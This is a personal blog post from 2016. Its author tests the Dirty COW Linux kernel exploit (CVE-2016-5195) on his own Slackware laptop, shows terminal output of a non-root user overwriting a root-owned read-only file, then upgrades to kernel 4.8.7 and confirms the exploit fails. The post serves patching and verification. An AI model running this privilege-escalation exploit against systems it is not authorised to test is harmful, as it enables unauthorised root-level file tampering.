Saturday 12 November 2016

Dirty Cow and Slackware


Dirty cow, or CVE-2016-5195 is a formidable exploit. It works in most Linux versions including Android. Here is a news article for easier reading.

I downloaded the exploit here and followed the instructions in dirtyc0w.c:

####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################

The program compile was no trouble:

~/dirtycow/dirtycow.github.io-master$gcc -pthread dirtyc0w.c -o dirtyc0w

Setting up for the exploit. Use your root account:

/home/heong/dirtycow/dirtycow.github.io-master$echo 'This is not a test' > foo
/home/heong/dirtycow/dirtycow.github.io-master$chmod 0404 foo
/home/heong/dirtycow/dirtycow.github.io-master$ls -lah foo
-r-----r-- 1 root root 19 Nov 13 12:46 foo
/home/heong/dirtycow/dirtycow.github.io-master$cat foo
This is not a test
/home/heong/dirtycow/dirtycow.github.io-master$exit
exit
~/dirtycow/dirtycow.github.io-master$cat foo
This is not a test

And the attack worked, when run as non-root user:

~/dirtycow/dirtycow.github.io-master$./dirtyc0w foo youdirtycow
mmap 7fd267f8f000

madvise 0

procselfmem 1100000000

~/dirtycow/dirtycow.github.io-master$cat foo
youdirtycow a test

Even worse, it worked on my current Linux kernel in use, 4.6.2. This called for a new kernel. The newest stable kernel was 4.8.7 

$rm /usr/src/linux
$ln -s /home/heong/Linux/linux-4.8.7 /usr/src/linux
$cd /usr/src/linux
/usr/src/linux$cp -ap /home/heong/Linux/linux-4.6.2/.config .
/usr/src/linux$make oldconfig
/usr/src/linux$make -j20 bzImage
/usr/src/linux$make -j20 modules
/usr/src/linux$make modules_install

Now copy the new kernel to the boot directory to be loaded:
/usr/src/linux$cp .config /boot/config
/usr/src/linux$cp System.map /boot/
/usr/src/linux$cp -a arch/x86/boot/bzImage /boot/
/usr/src/linux$liloconfig

Reboot the laptop:
/usr/src/linux$reboot

Again setting up for test as root:

/home/heong/dirtycow/dirtycow.github.io-master$echo 'This is not a test' > foo
/home/heong/dirtycow/dirtycow.github.io-master$chmod 0404 foo
/home/heong/dirtycow/dirtycow.github.io-master$exit
exit
~/dirtycow/dirtycow.github.io-master$cat foo
This is not a test
~/dirtycow/dirtycow.github.io-master$ls -lah foo
-r-----r-- 1 heong users 19 Nov 13 15:21 foo

Now Dirty Cow is rebuffed:

~/dirtycow/dirtycow.github.io-master$./dirtyc0w foo thishadbetterwork
mmap 7f695f9c7000

madvise 0

procselfmem 1700000000

~/dirtycow/dirtycow.github.io-master$cat foo
This is not a test

Now I only have to upgrade every Linux computer I own ... :7(